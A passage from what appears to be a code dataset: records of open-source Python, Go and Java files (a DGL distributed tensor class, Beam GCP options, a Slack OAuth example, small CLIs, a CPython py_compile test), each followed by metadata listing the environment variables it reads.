inpath = os.path.join(archive_dir, sitename, "ROI", outname)
outpath = inpath
if verbose:
print("output file: {0}".format(outname))
# get ROI list
roi_list = get_roi_list(sitename, roiname)
# read existing CSV file - since this is an update throw
# exception if the file doesn't already exist
try:
roits = IRROITimeSeries(site=sitename, ROIListID=roiname)
roits.readCSV(inpath)
except IOError:
errmsg = "Unable to read IR CSV file: {0}\n".format(outpath)
sys.stderr.write(errmsg)
sys.exit(1)
# read in config file for this site if it exists
config_file = "{0}_{1}.cfg".format(sitename, roiname)
config_path = os.path.join(archive_dir, sitename, "ROI", config_file)
if os.path.exists(config_path):
cfgparser = configparser(defaults={"resize": str(default_resize)})
cfgparser.read(config_path)
if cfgparser.has_section("roi_timeseries"):
resizeFlg = cfgparser.getboolean("roi_timeseries", "resize")
else:
resizeFlg = default_resize
# verify that config matches CSV header!
if resizeFlg != roits.resizeFlg:
errmsg = "resize flag from config doesn't match CSV header\n"
sys.stderr.write(errmsg)
sys.exit(1)
else:
resizeFlg = default_resize
# print config values
if verbose:
print("")
print("ROI timeseries config:")
print("======================")
print("roi_list: ", "{0}_{1}_roi.csv".format(sitename, roiname))
if os.path.exists(config_path):
print("config file: {0}".format(config_file))
else:
print("config file: None")
print("Resize Flag: ", resizeFlg)
# get list of images already in CSV
old_imglist = roits.get_image_list()
# find last dt in current timeseries CSV
nlast = len(roits.rows) - 1
dt_last = roits.rows[nlast]["datetime"]
# add five seconds so that we don't reprocess last image
dt_last = dt_last + timedelta(seconds=5)
# start with images newer than last dt
dt_start = dt_last
if verbose:
print("last image at: {0}".format(dt_last))
# loop over mask entries in ROI list
nimage = 0
nupdate = 0
for imask, roimask in enumerate(roi_list.masks):
roi_startDT = roimask["start_dt"]
roi_endDT = roimask["end_dt"]
# skip this ROI maskfile if it's validity interval ends
# before last date before update
if roi_endDT < dt_start:
continue
# start_date = roi_startDT.date()
# end_date = roi_endDT.date()
# start_time = roi_startDT.time()
# end_time = roi_endDT.time()
maskfile = roimask["maskfile"]
# okay set the start datetime to the larger of dt_start (from
# last row of existing timeseries CSV) and the beginning of
# the ROI validity. We need to do this for the case where
# there is a gap between last row of CSV and beginning of next
# validity interval. This will often be the case when there
# are a series of "transitional images" between two
# stable/useful camera positions.
if dt_start < roi_startDT:
dt_start = roi_startDT
mask_path = os.path.join(archive_dir, sitename, "ROI", maskfile)
# print roi_path
try:
mask_img = Image.open(mask_path)
except Exception:
sys.stderr.write("Unable to open ROI mask file\n")
sys.exit(1)
# check that mask_img is in expected form
mask_mode = mask_img.mode
if mask_mode != "L":
# convert to 8-bit mask
mask_img = mask_img.convert("L")
# make a numpy mask
roimask = np.asarray(mask_img, dtype=np.bool8)
# get list of images for this timeperiod
imglist = utils.getsiteimglist(
sitename, getIR=True, startDT=dt_start, endDT=roi_endDT
)
nimage += len(imglist)
for impath in imglist:
if debug:
print(maskfile, impath)
# check if image already exists in list -- just to be
# sure!
fn = os.path.basename(impath)
try:
row_index = old_imglist.index(fn)
except Exception:
row_index = None
# append/insert row for this image/mask - shouldn't happen
# but just to be on safe side!
if row_index:
roits_row = roits.insert_row(impath, roimask, imask + 1)
else:
roits_row = roits.append_row(impath, roimask, imask + 1)
# check that we could append/insert a row
if roits_row:
nupdate += 1
else:
continue
if verbose:
csvstr = roits.format_csvrow(roits_row)
print(csvstr)
if debug:
if nupdate == 10:
break
# output CSV file
if dryrun:
nout = 0
else:
nout = roits.writeCSV(outpath)
print("Images processed: %d" % (nimage,))
print("Images added to CSV: %d" % (nupdate,))
print("Total: %d" % (nout,))
| []
| []
| [
"MKL_NUM_THREADS",
"OMP_NUM_THREADS"
]
| [] | ["MKL_NUM_THREADS", "OMP_NUM_THREADS"] | python | 2 | 0 | |
main.go | package main
import (
"context"
"fmt"
"log"
"os"
"runtime/debug"
"time"
"github.com/digineo/cambium-exporter/auth"
"github.com/digineo/cambium-exporter/exporter"
kingpin "gopkg.in/alecthomas/kingpin.v2"
)
// DefaultConfigPath points to the default config file location.
// This might be overwritten at build time (using -ldflags).
var DefaultConfigPath = "./config.toml"
// nolint: gochecknoglobals
var (
version = "dev"
commit = ""
date = ""
)
func main() {
log.SetFlags(log.Lshortfile)
listenAddress := kingpin.Flag("web.listen-address", "Address on which to expose metrics and web interface.").Default(":9836").String()
configFile := kingpin.Flag("config", "Path to configuration file.").Default(DefaultConfigPath).String()
performLogin := kingpin.Flag("login", "Perform login test, and dump session cookie.").Bool()
verbose := kingpin.Flag("verbose", "Increase log verbosity.").Short('V').Bool()
versionFlag := kingpin.Flag("version", "Print version information and exit.").Short('v').Bool()
kingpin.HelpFlag.Short('h')
kingpin.Parse()
if *versionFlag {
printVersion()
os.Exit(0)
}
if headless := os.Getenv("HEADLESS"); headless == "0" {
auth.SetHeadless(false)
}
if binary := os.Getenv("CHROME_BINARY"); binary != "" {
auth.SetExecPath(binary)
}
client, err := exporter.LoadClientConfig(*configFile, *verbose)
if err != nil {
log.Fatal(err.Error())
}
if *performLogin {
ctx, cancel := context.WithTimeout(context.Background(), 20*time.Second)
defer cancel()
info, err := auth.Login(ctx, client.Instance, client.Username, client.Password)
if err != nil {
log.Fatalf("login failed: %v", err)
return
}
log.Printf("login succeeded: %+v", info)
return
}
log.Fatal(client.Start(*listenAddress, version))
}
func printVersion() {
info, ok := debug.ReadBuildInfo()
if !ok {
return
}
const l = "%-10s %-50s %s\n"
fmt.Println("Dependencies\n------------")
fmt.Printf(l, "main", info.Main.Path, version)
for _, i := range info.Deps {
if r := i.Replace; r != nil {
fmt.Printf(l, "dep", r.Path, r.Version)
fmt.Printf(l, " replaces", i.Path, i.Version)
} else {
fmt.Printf(l, "dep", i.Path, i.Version)
}
}
}
| [
"\"HEADLESS\"",
"\"CHROME_BINARY\""
]
| []
| [
"HEADLESS",
"CHROME_BINARY"
]
| [] | ["HEADLESS", "CHROME_BINARY"] | go | 2 | 0 | |
python/dgl/distributed/dist_tensor.py | """Define distributed tensor."""
import os
from .dist_context import is_initialized
from .kvstore import get_kvstore
from .role import get_role
from .. import utils
from .. import backend as F
def _default_init_data(shape, dtype):
return F.zeros(shape, dtype, F.cpu())
# These IDs can identify the anonymous distributed tensors.
DIST_TENSOR_ID = 0
class DistTensor:
''' Distributed tensor.
``DistTensor`` references to a distributed tensor sharded and stored in a cluster of machines.
It has the same interface as Pytorch Tensor to access its metadata (e.g., shape and data type).
To access data in a distributed tensor, it supports slicing rows and writing data to rows.
It does not support any operators of a deep learning framework, such as addition and
multiplication.
Currently, distributed tensors are designed to store node data and edge data of a distributed
graph. Therefore, their first dimensions have to be the number of nodes or edges in the graph.
The tensors are sharded in the first dimension based on the partition policy of nodes
or edges. When a distributed tensor is created, the partition policy is automatically
determined based on the first dimension if the partition policy is not provided. If the first
dimension matches the number of nodes of a node type, ``DistTensor`` will use the partition
policy for this particular node type; if the first dimension matches the number of edges of
an edge type, ``DistTensor`` will use the partition policy for this particular edge type.
If DGL cannot determine the partition policy automatically (e.g., multiple node types or
edge types have the same number of nodes or edges), users have to explicity provide
the partition policy.
A distributed tensor can be ether named or anonymous.
When a distributed tensor has a name, the tensor can be persistent if ``persistent=True``.
Normally, DGL destroys the distributed tensor in the system when the ``DistTensor`` object
goes away. However, a persistent tensor lives in the system even if
the ``DistTenor`` object disappears in the trainer process. The persistent tensor has
the same life span as the DGL servers. DGL does not allow an anonymous tensor to be persistent.
When a ``DistTensor`` object is created, it may reference to an existing distributed tensor or
create a new one. A distributed tensor is identified by the name passed to the constructor.
If the name exists, ``DistTensor`` will reference the existing one.
In this case, the shape and the data type must match the existing tensor.
If the name doesn't exist, a new tensor will be created in the kvstore.
When a distributed tensor is created, its values are initialized to zero. Users
can define an initialization function to control how the values are initialized.
The init function has two input arguments: shape and data type and returns a tensor.
Below shows an example of an init function:
.. highlight:: python
.. code-block:: python
def init_func(shape, dtype):
return torch.ones(shape=shape, dtype=dtype)
Parameters
----------
shape : tuple
The shape of the tensor. The first dimension has to be the number of nodes or
the number of edges of a distributed graph.
dtype : dtype
The dtype of the tensor. The data type has to be the one in the deep learning framework.
name : string, optional
The name of the embeddings. The name can uniquely identify embeddings in a system
so that another ``DistTensor`` object can referent to the distributed tensor.
init_func : callable, optional
The function to initialize data in the tensor. If the init function is not provided,
the values of the embeddings are initialized to zero.
part_policy : PartitionPolicy, optional
The partition policy of the rows of the tensor to different machines in the cluster.
Currently, it only supports node partition policy or edge partition policy.
The system determines the right partition policy automatically.
persistent : bool
Whether the created tensor lives after the ``DistTensor`` object is destroyed.
is_gdata : bool
Whether the created tensor is a ndata/edata or not.
Examples
--------
>>> init = lambda shape, dtype: th.ones(shape, dtype=dtype)
>>> arr = dgl.distributed.DistTensor((g.number_of_nodes(), 2), th.int32, init_func=init)
>>> print(arr[0:3])
tensor([[1, 1],
[1, 1],
[1, 1]], dtype=torch.int32)
>>> arr[0:3] = th.ones((3, 2), dtype=th.int32) * 2
>>> print(arr[0:3])
tensor([[2, 2],
[2, 2],
[2, 2]], dtype=torch.int32)
Note
----
The creation of ``DistTensor`` is a synchronized operation. When a trainer process tries to
create a ``DistTensor`` object, the creation succeeds only when all trainer processes
do the same.
'''
def __init__(self, shape, dtype, name=None, init_func=None, part_policy=None,
persistent=False, is_gdata=True):
self.kvstore = get_kvstore()
assert self.kvstore is not None, \
'Distributed module is not initialized. Please call dgl.distributed.initialize.'
self._shape = shape
self._dtype = dtype
part_policies = self.kvstore.all_possible_part_policy
# If a user doesn't provide a partition policy, we should find one based on
# the input shape.
if part_policy is None:
for policy_name in part_policies:
policy = part_policies[policy_name]
if policy.get_size() == shape[0]:
# If multiple partition policies match the input shape, we cannot
# decide which is the right one automatically. We should ask users
# to provide one.
assert part_policy is None, \
'Multiple partition policies match the input shape. ' \
+ 'Please provide a partition policy explicitly.'
part_policy = policy
assert part_policy is not None, \
'Cannot find a right partition policy. It is either because ' \
+ 'its first dimension does not match the number of nodes or edges ' \
+ 'of a distributed graph or there does not exist a distributed graph.'
self._tensor_name = name
self._part_policy = part_policy
assert part_policy.get_size() == shape[0], \
'The partition policy does not match the input shape.'
if init_func is None:
init_func = _default_init_data
exist_names = self.kvstore.data_name_list()
# If a user doesn't provide a name, we generate a name ourselves.
# We need to generate the name in a deterministic way.
if name is None:
assert not persistent, 'We cannot generate anonymous persistent distributed tensors'
global DIST_TENSOR_ID
# All processes of the same role should create DistTensor synchronously.
# Thus, all of them should have the same IDs.
name = 'anonymous-' + get_role() + '-' + str(DIST_TENSOR_ID)
DIST_TENSOR_ID += 1
assert isinstance(name, str), 'name {} is type {}'.format(name, type(name))
data_name = part_policy.get_data_name(name)
self._name = str(data_name)
self._persistent = persistent
if self._name not in exist_names:
self.kvstore.init_data(self._name, shape, dtype, part_policy, init_func, is_gdata)
self._owner = True
else:
self._owner = False
dtype1, shape1, _ = self.kvstore.get_data_meta(self._name)
assert dtype == dtype1, 'The dtype does not match with the existing tensor'
assert shape == shape1, 'The shape does not match with the existing tensor'
def __del__(self):
initialized = os.environ.get('DGL_DIST_MODE', 'standalone') == 'standalone' \
or is_initialized()
if not self._persistent and self._owner and initialized:
self.kvstore.delete_data(self._name)
def __getitem__(self, idx):
idx = utils.toindex(idx)
idx = idx.tousertensor()
return self.kvstore.pull(name=self._name, id_tensor=idx)
def __setitem__(self, idx, val):
idx = utils.toindex(idx)
idx = idx.tousertensor()
# TODO(zhengda) how do we want to support broadcast (e.g., G.ndata['h'][idx] = 1).
self.kvstore.push(name=self._name, id_tensor=idx, data_tensor=val)
def __len__(self):
return self._shape[0]
@property
def part_policy(self):
'''Return the partition policy
Returns
-------
PartitionPolicy
The partition policy of the distributed tensor.
'''
return self._part_policy
@property
def shape(self):
'''Return the shape of the distributed tensor.
Returns
-------
tuple
The shape of the distributed tensor.
'''
return self._shape
@property
def dtype(self):
'''Return the data type of the distributed tensor.
Returns
------
dtype
The data type of the tensor.
'''
return self._dtype
@property
def name(self):
'''Return the name of the distributed tensor
Returns
-------
str
The name of the tensor.
'''
return self._name
@property
def tensor_name(self):
'''Return the tensor name
Returns
-------
str
The name of the tensor.
'''
return self._tensor_name
| []
| []
| [
"DGL_DIST_MODE"
]
| [] | ["DGL_DIST_MODE"] | python | 1 | 0 | |
sdks/java/core/src/main/java/org/apache/beam/sdk/options/GcpOptions.java | /*
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.beam.sdk.options;
import com.fasterxml.jackson.annotation.JsonIgnore;
import com.google.auth.Credentials;
import com.google.common.annotations.VisibleForTesting;
import com.google.common.base.Strings;
import com.google.common.io.Files;
import java.io.File;
import java.io.IOException;
import java.nio.charset.StandardCharsets;
import java.security.GeneralSecurityException;
import java.util.Locale;
import java.util.Map;
import java.util.regex.Matcher;
import java.util.regex.Pattern;
import javax.annotation.Nullable;
import org.apache.beam.sdk.util.CredentialFactory;
import org.apache.beam.sdk.util.GcpCredentialFactory;
import org.apache.beam.sdk.util.InstanceBuilder;
import org.apache.beam.sdk.util.PathValidator;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
/**
* Options used to configure Google Cloud Platform specific options such as the project
* and credentials.
*
* <p>These options defer to the
* <a href="https://developers.google.com/accounts/docs/application-default-credentials">
* application default credentials</a> for authentication. See the
* <a href="https://github.com/google/google-auth-library-java">Google Auth Library</a> for
* alternative mechanisms for creating credentials.
*/
@Description("Options used to configure Google Cloud Platform project and credentials.")
public interface GcpOptions extends GoogleApiDebugOptions, PipelineOptions {
/**
* Project id to use when launching jobs.
*/
@Description("Project id. Required when running a Dataflow in the cloud. "
+ "See https://cloud.google.com/storage/docs/projects for further details.")
@Default.InstanceFactory(DefaultProjectFactory.class)
String getProject();
void setProject(String value);
/**
* The class of the credential factory that should be created and used to create
* credentials. If gcpCredential has not been set explicitly, an instance of this class will
* be constructed and used as a credential factory.
*/
@Description("The class of the credential factory that should be created and used to create "
+ "credentials. If gcpCredential has not been set explicitly, an instance of this class will "
+ "be constructed and used as a credential factory.")
@Default.Class(GcpCredentialFactory.class)
Class<? extends CredentialFactory> getCredentialFactoryClass();
void setCredentialFactoryClass(
Class<? extends CredentialFactory> credentialFactoryClass);
/**
* The credential instance that should be used to authenticate against GCP services.
* If no credential has been set explicitly, the default is to use the instance factory
* that constructs a credential based upon the currently set credentialFactoryClass.
*/
@JsonIgnore
@Description("The credential instance that should be used to authenticate against GCP services. "
+ "If no credential has been set explicitly, the default is to use the instance factory "
+ "that constructs a credential based upon the currently set credentialFactoryClass.")
@Default.InstanceFactory(GcpUserCredentialsFactory.class)
Credentials getGcpCredential();
void setGcpCredential(Credentials value);
/**
* Attempts to infer the default project based upon the environment this application
* is executing within. Currently this only supports getting the default project from gcloud.
*/
class DefaultProjectFactory implements DefaultValueFactory<String> {
private static final Logger LOG = LoggerFactory.getLogger(DefaultProjectFactory.class);
@Override
public String create(PipelineOptions options) {
try {
File configFile;
if (getEnvironment().containsKey("CLOUDSDK_CONFIG")) {
configFile = new File(getEnvironment().get("CLOUDSDK_CONFIG"), "properties");
} else if (isWindows() && getEnvironment().containsKey("APPDATA")) {
configFile = new File(getEnvironment().get("APPDATA"), "gcloud/properties");
} else {
// New versions of gcloud use this file
configFile = new File(
System.getProperty("user.home"),
".config/gcloud/configurations/config_default");
if (!configFile.exists()) {
// Old versions of gcloud use this file
configFile = new File(System.getProperty("user.home"), ".config/gcloud/properties");
}
}
String section = null;
Pattern projectPattern = Pattern.compile("^project\\s*=\\s*(.*)$");
Pattern sectionPattern = Pattern.compile("^\\[(.*)\\]$");
for (String line : Files.readLines(configFile, StandardCharsets.UTF_8)) {
line = line.trim();
if (line.isEmpty() || line.startsWith(";")) {
continue;
}
Matcher matcher = sectionPattern.matcher(line);
if (matcher.matches()) {
section = matcher.group(1);
} else if (section == null || section.equals("core")) {
matcher = projectPattern.matcher(line);
if (matcher.matches()) {
String project = matcher.group(1).trim();
LOG.info("Inferred default GCP project '{}' from gcloud. If this is the incorrect "
+ "project, please cancel this Pipeline and specify the command-line "
+ "argument --project.", project);
return project;
}
}
}
} catch (IOException expected) {
LOG.debug("Failed to find default project.", expected);
}
// return null if can't determine
return null;
}
/**
* Returns true if running on the Windows OS.
*/
private static boolean isWindows() {
return System.getProperty("os.name").toLowerCase(Locale.ENGLISH).contains("windows");
}
/**
* Used to mock out getting environment variables.
*/
@VisibleForTesting
Map<String, String> getEnvironment() {
return System.getenv();
}
}
/**
* Attempts to load the GCP credentials. See
* {@link CredentialFactory#getCredential()} for more details.
*/
class GcpUserCredentialsFactory implements DefaultValueFactory<Credentials> {
@Override
public Credentials create(PipelineOptions options) {
GcpOptions gcpOptions = options.as(GcpOptions.class);
try {
CredentialFactory factory = InstanceBuilder.ofType(CredentialFactory.class)
.fromClass(gcpOptions.getCredentialFactoryClass())
.fromFactoryMethod("fromOptions")
.withArg(PipelineOptions.class, options)
.build();
return factory.getCredential();
} catch (IOException | GeneralSecurityException e) {
throw new RuntimeException("Unable to obtain credential", e);
}
}
}
/**
* A GCS path for storing temporary files in GCP.
*
* <p>Its default to {@link PipelineOptions#getTempLocation}.
*/
@Description("A GCS path for storing temporary files in GCP.")
@Default.InstanceFactory(GcpTempLocationFactory.class)
@Nullable String getGcpTempLocation();
void setGcpTempLocation(String value);
/**
* Returns {@link PipelineOptions#getTempLocation} as the default GCP temp location.
*/
class GcpTempLocationFactory implements DefaultValueFactory<String> {
@Override
@Nullable
public String create(PipelineOptions options) {
String tempLocation = options.getTempLocation();
if (!Strings.isNullOrEmpty(tempLocation)) {
try {
PathValidator validator = options.as(GcsOptions.class).getPathValidator();
validator.validateOutputFilePrefixSupported(tempLocation);
} catch (Exception e) {
// Ignore the temp location because it is not a valid 'gs://' path.
return null;
}
}
return tempLocation;
}
}
}
| []
| []
| []
| [] | [] | java | 0 | 0 | |
vendor/github.com/lestrrat/go-slack/slack_example_test.go | package slack_test
import (
"context"
"crypto/rand"
"fmt"
"net/http"
"os"
"golang.org/x/oauth2"
slack "github.com/lestrrat/go-slack"
)
func ExampleClient() {
ctx, cancel := context.WithCancel(context.Background())
defer cancel()
token := os.Getenv("SLACK_TOKEN")
cl := slack.New(token)
// check if we are connected
authres, err := cl.Auth().Test().Do(ctx)
if err != nil {
fmt.Printf("failed to test authentication: %s\n", err)
return
}
fmt.Printf("%#v\n", authres)
// simplest possible message
chatres, err := cl.Chat().PostMessage("@username").
Text("Hello, World!").
Do(ctx)
if err != nil {
fmt.Printf("failed to post messsage: %s\n", err)
return
}
fmt.Printf("%#v\n", chatres)
}
func ExampleOAuth2() {
ctx, cancel := context.WithCancel(context.Background())
defer cancel()
// When you create a Slack App, you need to authorize your app through OAuth2
//
// If you installed your app via the Web UI, you should be able to see the
// tokens generated when you did so at https://api.slack.com/apps/XXXXXX/oauth
// where XXXXXX is a random ID generated for your app.
//
// You could used these tokens, or you can do a manual OAuth2 flow, which is
// shown in pseudo-working form below. (note: most it just straight oauth2
// taken from https://godoc.org/golang.org/x/oauth2#example-Config)
// However, Slack does not allow offline flow, so you will need to actually
// run this in a webserver, unlike the example in the above URL.
conf := oauth2.Config{
ClientID: os.Getenv("SLACK_APP_CLIENT_ID"),
ClientSecret: os.Getenv("SLACK_APP_CLIENT_SECRET"),
RedirectURL: os.Getenv("SLACK_APP_REDIRECT_URL"),
Scopes: []string{
slack.ChatWriteBotScope,
},
Endpoint: slack.OAuth2Endpoint,
}
http.HandleFunc("/oauth/start", func(w http.ResponseWriter, r *http.Request) {
// Poor man's UUID
b := make([]byte, 16)
rand.Reader.Read(b)
b[6] = (b[6] & 0x0F) | 0x40
b[8] = (b[8] &^ 0x40) | 0x80
state := fmt.Sprintf("%x-%x-%x-%x-%x", b[0:4], b[4:6], b[6:8], b[8:10], b[10:])
// TODO: Use session or whatever to save "state", so the user
// can be verified
// Redirect user to consent page to ask for permission
// for the scopes specified above.
url := conf.AuthCodeURL(state)
w.Header().Set("Location", url)
w.WriteHeader(http.StatusFound)
})
http.HandleFunc("/oauth/callback", func(w http.ResponseWriter, r *http.Request) {
code := r.FormValue("code")
// TODO: Use session or whatever to restore "state", so the user
// can be verified
tok, err := conf.Exchange(ctx, code)
if err != nil {
http.Error(w, "failed to exchange tokens", http.StatusInternalServerError)
return
}
// You could store tok.AccessToken for later use, or you can immediately
// start a client like this
cl := slack.New(tok.AccessToken)
if _, err := cl.Auth().Test().Do(ctx); err != nil {
http.Error(w, "failed to test auth", http.StatusInternalServerError)
return
}
w.Header().Set("Contenxt-Type", "text/plain")
w.WriteHeader(http.StatusOK)
w.Write([]byte("Successfully connected to Slack"))
})
http.ListenAndServe(":8080", nil)
}
| [
"\"SLACK_TOKEN\"",
"\"SLACK_APP_CLIENT_ID\"",
"\"SLACK_APP_CLIENT_SECRET\"",
"\"SLACK_APP_REDIRECT_URL\""
]
| []
| [
"SLACK_APP_CLIENT_SECRET",
"SLACK_APP_REDIRECT_URL",
"SLACK_TOKEN",
"SLACK_APP_CLIENT_ID"
]
| [] | ["SLACK_APP_CLIENT_SECRET", "SLACK_APP_REDIRECT_URL", "SLACK_TOKEN", "SLACK_APP_CLIENT_ID"] | go | 4 | 0 | |
pkg/app/app.go | package app
import (
"context"
"fmt"
"os"
"time"
"github.com/fatih/color"
"github.com/spf13/cobra"
"github.com/micnncim/repoconfig/pkg/github"
"github.com/micnncim/repoconfig/pkg/http"
"github.com/micnncim/repoconfig/pkg/logging"
"github.com/micnncim/repoconfig/pkg/spinner"
"github.com/micnncim/repoconfig/pkg/survey"
)
type app struct {
githubClient github.Client
spinner *spinner.Spinner
}
type repository struct {
owner, repo string
}
func NewCommand() (*cobra.Command, error) {
logger, err := logging.NewLogger(os.Stderr, logging.LevelInfo, logging.FormatColorConsole)
if err != nil {
return nil, err
}
logger = logger.Named("app")
httpClient, err := http.NewClient(
github.APIBaseURL,
http.WithLogger(logger),
)
if err != nil {
return nil, err
}
githubClient, err := github.NewClient(
os.Getenv("GITHUB_TOKEN"),
httpClient,
github.WithLogger(logger),
)
if err != nil {
return nil, err
}
app := &app{
githubClient: githubClient,
spinner: spinner.New(),
}
cmd := &cobra.Command{
Use: "repoconfig <OWNER> <REPO>",
Short: "CLI to update repository config",
RunE: app.run,
}
return cmd, nil
}
func (a *app) run(_ *cobra.Command, args []string) error {
if len(args) != 2 {
return fmt.Errorf("invalid arguments: %q", args)
}
owner, repo := args[0], args[1]
ctx, cancel := context.WithTimeout(context.Background(), 10*time.Minute)
defer cancel()
repository, err := a.getRepository(ctx, owner, repo)
if err != nil {
return err
}
input, err := askUpdateRepositoryInput(survey.NewSurveyor(), repository)
switch err {
case nil:
case ErrRepositoryNoChange:
warnf("\n🤖 %s/%s has not been changed\n", owner, repo)
return nil
default:
return err
}
if err := a.githubClient.UpdateRepository(ctx, owner, repo, input); err != nil {
return err
}
infof("\n🚀 https://github.com/%s/%s has been updated\n", owner, repo)
return nil
}
func (a *app) getRepository(ctx context.Context, owner, repo string) (*github.Repository, error) {
a.spinner.Start(color.CyanString("🤖 fetching %s/%s...", owner, repo))
defer a.spinner.Stop()
return a.githubClient.GetRepository(ctx, owner, repo)
}
| [
"\"GITHUB_TOKEN\""
]
| []
| [
"GITHUB_TOKEN"
]
| [] | ["GITHUB_TOKEN"] | go | 1 | 0 | |
chapter04/orm_field_demo/orm_field_demo/wsgi.py | """
WSGI config for orm_field_demo project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.0/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "orm_field_demo.settings")
application = get_wsgi_application()
| []
| []
| []
| [] | [] | python | 0 | 0 | |
Lib/test/test_py_compile.py | import functools
import importlib.util
import os
import py_compile
import shutil
import stat
import subprocess
import sys
import tempfile
import unittest
from test import support
from test.support import os_helper, script_helper
def without_source_date_epoch(fxn):
"""Runs function with SOURCE_DATE_EPOCH unset."""
@functools.wraps(fxn)
def wrapper(*args, **kwargs):
with os_helper.EnvironmentVarGuard() as env:
env.unset('SOURCE_DATE_EPOCH')
return fxn(*args, **kwargs)
return wrapper
def with_source_date_epoch(fxn):
"""Runs function with SOURCE_DATE_EPOCH set."""
@functools.wraps(fxn)
def wrapper(*args, **kwargs):
with os_helper.EnvironmentVarGuard() as env:
env['SOURCE_DATE_EPOCH'] = '123456789'
return fxn(*args, **kwargs)
return wrapper
# Run tests with SOURCE_DATE_EPOCH set or unset explicitly.
class SourceDateEpochTestMeta(type(unittest.TestCase)):
def __new__(mcls, name, bases, dct, *, source_date_epoch):
cls = super().__new__(mcls, name, bases, dct)
for attr in dir(cls):
if attr.startswith('test_'):
meth = getattr(cls, attr)
if source_date_epoch:
wrapper = with_source_date_epoch(meth)
else:
wrapper = without_source_date_epoch(meth)
setattr(cls, attr, wrapper)
return cls
class PyCompileTestsBase:
def setUp(self):
self.directory = tempfile.mkdtemp(dir=os.getcwd())
self.source_path = os.path.join(self.directory, '_test.py')
self.pyc_path = self.source_path + 'c'
self.cache_path = importlib.util.cache_from_source(self.source_path)
self.cwd_drive = os.path.splitdrive(os.getcwd())[0]
# In these tests we compute relative paths. When using Windows, the
# current working directory path and the 'self.source_path' might be
# on different drives. Therefore we need to switch to the drive where
# the temporary source file lives.
drive = os.path.splitdrive(self.source_path)[0]
if drive:
os.chdir(drive)
with open(self.source_path, 'w') as file:
file.write('x = 123\n')
def tearDown(self):
shutil.rmtree(self.directory)
if self.cwd_drive:
os.chdir(self.cwd_drive)
def test_absolute_path(self):
py_compile.compile(self.source_path, self.pyc_path)
self.assertTrue(os.path.exists(self.pyc_path))
self.assertFalse(os.path.exists(self.cache_path))
def test_do_not_overwrite_symlinks(self):
# In the face of a cfile argument being a symlink, bail out.
# Issue #17222
try:
os.symlink(self.pyc_path + '.actual', self.pyc_path)
except (NotImplementedError, OSError):
self.skipTest('need to be able to create a symlink for a file')
else:
assert os.path.islink(self.pyc_path)
with self.assertRaises(FileExistsError):
py_compile.compile(self.source_path, self.pyc_path)
@unittest.skipIf(not os.path.exists(os.devnull) or os.path.isfile(os.devnull),
'requires os.devnull and for it to be a non-regular file')
def test_do_not_overwrite_nonregular_files(self):
# In the face of a cfile argument being a non-regular file, bail out.
# Issue #17222
with self.assertRaises(FileExistsError):
py_compile.compile(self.source_path, os.devnull)
def test_cache_path(self):
py_compile.compile(self.source_path)
self.assertTrue(os.path.exists(self.cache_path))
def test_cwd(self):
with os_helper.change_cwd(self.directory):
py_compile.compile(os.path.basename(self.source_path),
os.path.basename(self.pyc_path))
self.assertTrue(os.path.exists(self.pyc_path))
self.assertFalse(os.path.exists(self.cache_path))
def test_relative_path(self):
py_compile.compile(os.path.relpath(self.source_path),
os.path.relpath(self.pyc_path))
self.assertTrue(os.path.exists(self.pyc_path))
self.assertFalse(os.path.exists(self.cache_path))
@unittest.skipIf(hasattr(os, 'geteuid') and os.geteuid() == 0,
'non-root user required')
@unittest.skipIf(os.name == 'nt',
'cannot control directory permissions on Windows')
def test_exceptions_propagate(self):
# Make sure that exceptions raised thanks to issues with writing
# bytecode.
# http://bugs.python.org/issue17244
mode = os.stat(self.directory)
os.chmod(self.directory, stat.S_IREAD)
try:
with self.assertRaises(IOError):
py_compile.compile(self.source_path, self.pyc_path)
finally:
os.chmod(self.directory, mode.st_mode)
def test_bad_coding(self):
bad_coding = os.path.join(os.path.dirname(__file__), 'bad_coding2.py')
with support.captured_stderr():
self.assertIsNone(py_compile.compile(bad_coding, doraise=False))
self.assertFalse(os.path.exists(
importlib.util.cache_from_source(bad_coding)))
def test_source_date_epoch(self):
py_compile.compile(self.source_path, self.pyc_path)
self.assertTrue(os.path.exists(self.pyc_path))
self.assertFalse(os.path.exists(self.cache_path))
with open(self.pyc_path, 'rb') as fp:
flags = importlib._bootstrap_external._classify_pyc(
fp.read(), 'test', {})
if os.environ.get('SOURCE_DATE_EPOCH'):
expected_flags = 0b11
else:
expected_flags = 0b00
self.assertEqual(flags, expected_flags)
@unittest.skipIf(sys.flags.optimize > 0, 'test does not work with -O')
def test_double_dot_no_clobber(self):
# http://bugs.python.org/issue22966
# py_compile foo.bar.py -> __pycache__/foo.cpython-34.pyc
weird_path = os.path.join(self.directory, 'foo.bar.py')
cache_path = importlib.util.cache_from_source(weird_path)
pyc_path = weird_path + 'c'
head, tail = os.path.split(cache_path)
penultimate_tail = os.path.basename(head)
self.assertEqual(
os.path.join(penultimate_tail, tail),
os.path.join(
'__pycache__',
'foo.bar.{}.pyc'.format(sys.implementation.cache_tag)))
with open(weird_path, 'w') as file:
file.write('x = 123\n')
py_compile.compile(weird_path)
self.assertTrue(os.path.exists(cache_path))
self.assertFalse(os.path.exists(pyc_path))
def test_optimization_path(self):
# Specifying optimized bytecode should lead to a path reflecting that.
self.assertIn('opt-2', py_compile.compile(self.source_path, optimize=2))
def test_invalidation_mode(self):
py_compile.compile(
self.source_path,
invalidation_mode=py_compile.PycInvalidationMode.CHECKED_HASH,
)
with open(self.cache_path, 'rb') as fp:
flags = importlib._bootstrap_external._classify_pyc(
fp.read(), 'test', {})
self.assertEqual(flags, 0b11)
py_compile.compile(
self.source_path,
invalidation_mode=py_compile.PycInvalidationMode.UNCHECKED_HASH,
)
with open(self.cache_path, 'rb') as fp:
